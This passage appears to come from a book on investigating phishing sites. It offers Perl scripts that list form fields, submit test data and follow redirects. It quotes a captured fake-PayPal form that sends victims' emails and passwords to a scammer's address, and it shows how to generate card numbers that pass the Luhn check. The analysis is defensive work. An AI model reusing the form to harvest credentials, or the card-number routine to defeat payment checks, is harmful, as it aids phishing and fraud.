Filling Out Forms

Whether a site is selling fake Viagra or pretending to be your bank, at some point it is going to ask you for information such as your credit card number. It will solicit that data using an HTML form and submit it to a server-side script that records it in some way. The elements of that form reveal the names of the input parameters that the script expects.

Example 5-3 shows a Perl script that extracts these form elements from a saved web page. The script uses the HTML::TokeParser module to handle all the HTML parsing.

Example 5-3. extract_form_elements.pl

#!/usr/bin/perl -w
# Print the form-related tags found in a saved HTML file
use strict;
use HTML::TokeParser;
die "Usage: $0 <html file>\n" unless @ARGV == 1;
my $p = HTML::TokeParser->new($ARGV[0]) || die "Can't open: $!";
# Tags that make up a form and its input elements
my %form_tag = map { $_ => 1 } qw(form button input select option textarea);
while(my $token = $p->get_token) {
  if($token->[0] eq 'S') {
     # Start tag: element 1 is the tag name, element 4 is the original text
     if($form_tag{$token->[1]}) {
        print $token->[4] . "\n";
     }
  } elsif($token->[0] eq 'E') {
     # End tag: element 1 is the tag name, element 2 is the original text
     if($token->[1] eq 'form') {
        print $token->[2] . "\n\n";
     }
  }
}

When supplied with the name of a saved HTML file, the script outputs the tags associated with any forms on the page. In this example of a fake PayPal site, the form attempts to capture the victim’s email address and password in the fields login_email and login_password, and submit those to a CGI script called web2mail.cgi.

    % extract_form_elements.pl log1.htm
    <FORM action=http://<domain>/cgi-bin/web2mail.cgi method=post>
    <INPUT type=hidden value=mailexpress2007@lovemail.co.uk
    name=.email_target>
    <INPUT type=hidden value=xxeMailxx name=.mail_subject>
    <INPUT type=hidden
    value=http://66.219.102.57/aw-cgi/ppal/checkin.php
    name=.thanks_url>
    <input type="text" id="" name="login_email" value="">
    <input type="password" id="" name="login_password" value="">
    <input type="submit" name="submit.x" value="Log In">
    </form>

The form also includes three hidden fields. Rather than use its own server-side script, this site uses a script at an unsuspecting legitimate site to convert the contents of the form into an email message. In this case the message is sent to the operator of the scam, whose address is specified in the parameter .email_target. It even tracks the URL of the site that successfully captured the data in the value of the .thanks_url parameter.
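The parameter names and their values can also be pulled out of the tags directly. The following is a minimal sketch, assuming the same HTML::TokeParser module used in Example 5-3. The helper name form_fields, the host phish.example, and the address someone@example.com are placeholders invented for illustration; the sample HTML is an abbreviated stand-in for the form shown above.

```perl
#!/usr/bin/perl -w
use strict;
use HTML::TokeParser;

# Return a list of [type, name, value] triples, one for each <input> tag
# in the HTML text that is passed in. (form_fields is a hypothetical helper.)
sub form_fields {
    my ($html) = @_;
    my $p = HTML::TokeParser->new(\$html) or die "Can't parse HTML";
    my @fields;
    while (my $tag = $p->get_tag('input')) {
        my $attr = $tag->[1];   # hash of attributes, names in lowercase
        push @fields, [ $attr->{type}  // 'text',
                        $attr->{name}  // '',
                        $attr->{value} // '' ];
    }
    return @fields;
}

# Sample input modeled on the form shown above (placeholder host and address)
my $sample = <<'HTML';
<FORM action=http://phish.example/cgi-bin/web2mail.cgi method=post>
<INPUT type=hidden value=someone@example.com name=.email_target>
<input type="text" id="" name="login_email" value="">
<input type="password" id="" name="login_password" value="">
</form>
HTML

foreach my $field (form_fields($sample)) {
    printf "%-10s %-16s %s\n", @$field;
}
```

Listing the fields this way makes hidden parameters such as .email_target stand out, since their values are set by the page rather than by the victim.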

Scripts that send email to an address that is specified within the form represent a well-known, and extremely large, security hole, so I have replaced the real hostname with the string <domain>.

To understand how a particular site operates, try entering some test data into its forms and submitting them. Clearly you don’t want to enter any real data that might be used to identify you. However, you should be aware that the server running the suspect web site will be able to log your IP address, separately from the data you enter in the form. If you are concerned about your anonymity when you explore sites like these, then you should consider the techniques for hiding your identity that I discuss in Chapter 7.

As long as you feel comfortable in that regard, just try entering made-up data in the form and see what happens. In most cases, the scripts will accept any kind of nonsense that you choose to enter, but not always.
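If you would rather script the submission than type into a browser, something like the following sketch might serve as a starting point. It assumes the HTTP::Request::Common and LWP::UserAgent modules, neither of which is used elsewhere in this section. The URL phish.example, the helper name build_test_request, and the field values are all made up; only the field names come from the example form. Run without arguments, it prints the request without contacting any server.

```perl
#!/usr/bin/perl -w
use strict;
use HTTP::Request::Common qw(POST);

# Build a POST request carrying made-up form data. The field names are
# taken from the example form; the values are obviously bogus.
# (build_test_request is a hypothetical helper.)
sub build_test_request {
    my ($url) = @_;
    return POST($url, [
        login_email    => 'nobody@example.com',
        login_password => 'not-a-real-password',
    ]);
}

# With no arguments, just show the request that would be sent to a
# placeholder URL. Supply a URL on the command line to really submit it.
my $url = @ARGV ? $ARGV[0] : 'http://phish.example/cgi-bin/login.cgi';
my $req = build_test_request($url);
print $req->as_string;

if (@ARGV) {
    require LWP::UserAgent;
    my $res = LWP::UserAgent->new(timeout => 30)->request($req);
    print $res->status_line, "\n";
    print $res->decoded_content // '';
}
```

The same caution about your IP address applies to a scripted request just as it does to a browser.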

Legitimate e-commerce sites will often use JavaScript to validate the information that a user enters into a form before it is submitted. If a phishing site copies a page like this, then it will also validate the input. If you want to enter bogus information into a form in order to see what happens next, then it will need to pass the validation step.

These tests are typically pretty basic, such as checking that you entered something into a required field or checking that your telephone number has 10 digits. The actual data that you enter is irrelevant as long as it passes that test. The one exception to the rule involves credit card numbers. You might think you can simply enter an arbitrary 16-digit number, such as 1234567812345678, but in many cases this will be rejected. In that case, trying other random numbers is also likely to fail. You certainly don’t want to enter a real credit card number.

The issue here is that credit card numbers are not arbitrary integers. In a typical 16-digit card number, the first 6 digits represent the issuing bank or company. Digits 7 through 15 represent the account number and the final digit is the check digit.
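As a small illustration of that layout, the sketch below splits a 16-digit number into its three parts. The helper name split_card_number is invented for this example, and the input is the arbitrary number mentioned earlier, not a real card.

```perl
#!/usr/bin/perl -w
use strict;

# Split a 16-digit card number into the three parts described in the text.
# (split_card_number is a hypothetical helper name.)
sub split_card_number {
    my ($number) = @_;
    (my $digits = $number) =~ s/\D//g;       # drop spaces and hyphens
    return unless length($digits) == 16;
    return (
        issuer  => substr($digits, 0, 6),    # digits 1 through 6
        account => substr($digits, 6, 9),    # digits 7 through 15
        check   => substr($digits, 15, 1),   # digit 16
    );
}

my %part = split_card_number('1234-5678-1234-5678');
print "Issuer:  $part{issuer}\n";
print "Account: $part{account}\n";
print "Check:   $part{check}\n";
```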

The check digit is computed from the other digits using the Luhn algorithm, named after its creator, Hans Peter Luhn. If the digit in position 16 does not match the result of the calculation, then the test will fail. For more information, you might like to consult Michael Gilleland’s web page on the “Anatomy of Credit Card Numbers” (http://www.merriampark.com/anatomycc.htm).

Starting with 15 arbitrary digits, you can calculate the corresponding check digit and thereby create a genuine fake credit card number. A JavaScript page that implements the validation check can be found at http://www.precisonline.com/ccvalidate.demo.html. If you need a fake number, you can use 4444-4444-4444-4448, or if you want something that looks more realistic, then try 4567-8912-3456-7898. Using 4 as the first digit defines this as a Visa card number.
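The calculation itself is short. The following Perl sketch is one way to write it, assuming the standard form of the Luhn algorithm: working from the right, every second digit is doubled, 9 is subtracted from any doubled value above 9, and the total must be a multiple of 10. The sub names luhn_sum, luhn_check_digit, and luhn_valid are my own and do not come from any library.

```perl
#!/usr/bin/perl -w
use strict;

# Add up the digits of a string using the Luhn scheme. Working from the
# right, every second digit is doubled, and 9 is subtracted from any
# doubled value above 9. $double_first says whether the rightmost digit
# is one of those that get doubled.
sub luhn_sum {
    my ($digits, $double_first) = @_;
    my $sum    = 0;
    my $double = $double_first;
    foreach my $d (reverse split //, $digits) {
        my $v = $double ? $d * 2 : $d;
        $v -= 9 if $v > 9;
        $sum += $v;
        $double = !$double;
    }
    return $sum;
}

# Given the first 15 digits, return the check digit for position 16
sub luhn_check_digit {
    my ($first15) = @_;
    return (10 - luhn_sum($first15, 1) % 10) % 10;
}

# True if a complete number, with or without hyphens, passes the test
sub luhn_valid {
    my ($number) = @_;
    (my $digits = $number) =~ s/\D//g;
    return luhn_sum($digits, 0) % 10 == 0;
}

print luhn_check_digit('444444444444444'), "\n";                    # 8
print luhn_valid('4567-8912-3456-7898') ? "valid\n" : "invalid\n";  # valid
print luhn_valid('1234567812345678')    ? "valid\n" : "invalid\n";  # invalid
```

The first line of output reproduces the final digit of 4444-4444-4444-4448, and the last line shows why the arbitrary number 1234567812345678 is rejected.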

Fortunately for all of us, the credit card industry requires more than a validated number before it hands over any cash. So don’t bother trying to use fake numbers on any real e-commerce site!

In most phishing attempts, when you submit a form, you will be forwarded to the home page of the web site that is being impersonated. Behind the scenes, the server-side script that received the form data will write it out to a file or into an email message. It will then return an HTML page that redirects you to the legitimate site.
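If you save the page that the script returns, you can look for the redirect yourself. The sketch below assumes that the redirect is done with a meta refresh tag, which is only one of several possibilities; a redirect made with JavaScript or with an HTTP Location header would not be found this way. The helper name meta_refresh_target and the sample page are invented for illustration.

```perl
#!/usr/bin/perl -w
use strict;
use HTML::TokeParser;

# Return the target URL of a <meta http-equiv="refresh"> tag, or undef
# if the page has none. (meta_refresh_target is a hypothetical helper.)
sub meta_refresh_target {
    my ($html) = @_;
    my $p = HTML::TokeParser->new(\$html) or die "Can't parse HTML";
    while (my $tag = $p->get_tag('meta')) {
        my $attr = $tag->[1];   # hash of attributes, names in lowercase
        next unless lc($attr->{'http-equiv'} // '') eq 'refresh';
        # The content attribute looks like "0; url=http://..."
        if (($attr->{content} // '') =~ /url\s*=\s*['"]?([^'"\s]+)/i) {
            return $1;
        }
    }
    return;
}

# Made-up example of the kind of page a phishing script might return
my $page = <<'HTML';
<html><head>
<meta http-equiv="Refresh" content="0; URL=https://www.paypal.com/">
</head><body></body></html>
HTML

my $target = meta_refresh_target($page);
print defined $target ? "Redirects to $target\n" : "No meta refresh found\n";
```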

Most of these scripts are surprisingly simple, and there is not a lot of opportunity to probe their inner workings. But it is always worth trying a few variations of parameters because every once in a while you trigger an error message that reveals something about the underlying software.